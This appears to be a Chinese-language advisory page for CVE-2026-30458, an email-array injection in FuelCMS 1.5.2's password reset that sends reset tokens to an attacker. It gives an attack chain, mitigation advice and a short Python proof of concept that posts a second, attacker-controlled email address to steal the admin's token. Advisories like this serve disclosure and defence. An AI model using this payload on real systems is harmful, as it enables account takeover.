CVE-2026-30458 CVSS 9.1 严重

CVE-2026-30458 FuelCMS邮件分割攻击致令牌泄露

披露日期: 2026-03-26

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-30458

漏洞类型

信息泄露

CVSS评分

9.1 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Daylight Studio FuelCMS

漏洞概述

Daylight Studio FuelCMS v1.5.2版本存在严重安全漏洞，允许攻击者利用邮件分割攻击窃取用户密码重置令牌。该漏洞无需身份认证即可远程触发，可能导致账户被接管。

技术细节

该漏洞源于FuelCMS在处理密码重置请求时，对用户输入的电子邮件参数缺乏严格的验证和过滤。攻击者可以通过构造特殊的HTTP请求，利用邮件分割攻击技术（Mail Splitting Attack），在邮件发送逻辑中注入恶意参数。具体而言，攻击者可能利用数组参数（如email[]）或CRLF注入，操纵邮件的发送目标，导致服务器将包含密码重置令牌的邮件发送给攻击者控制的邮箱。由于漏洞利用无需用户交互且攻击复杂度低，攻击者可轻易获取管理员权限，进而完全控制受影响的系统。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标FuelCMS系统及其版本信息（v1.5.2），并确认密码重置功能入口。

STEP 2

2. 漏洞利用

攻击者向密码重置接口发送特制的POST请求，利用邮件分割漏洞注入恶意邮箱地址。

STEP 3

3. 令牌窃取

系统处理请求时将密码重置令牌发送至攻击者控制的邮箱，而非仅发送给原用户。

STEP 4

4. 账户接管

攻击者使用窃取的令牌重置用户密码，从而非法获得系统访问权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests target_url = "http://target-fuelcms.com/fuel/users/forgot_password" # Payload exploiting mail splitting/email array data = { "user_name": "admin", "email[]": ["[email protected]", "[email protected]"] } try: response = requests.post(target_url, data=data) if response.status_code == 200: print("[+] Password reset request sent. Check attacker's email for token.") else: print("[-] Exploit failed.") except Exception as e: print(f"Error: {e}")

影响范围

Daylight Studio FuelCMS 1.5.2

防御指南

临时缓解措施

建议立即检查并限制对外部邮箱参数的接收，严格校验输入数据格式，防止邮件头注入。在未修复前，可考虑暂时禁用密码重置功能或仅允许通过内部渠道重置。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-30458
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-30458
3 Details https://www.cvedetails.com/cve/CVE-2026-30458/
4 VulDB https://vuldb.com/cve/CVE-2026-30458
5 Link http://daylight.com
6 Link http://fuelcms.com
7 Link https://github.com/daylightstudio/FUEL-CMS
8 Link https://pentest-tools.com/PTT-2025-025-Account-Takeover-via-Email-Array.pdf

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表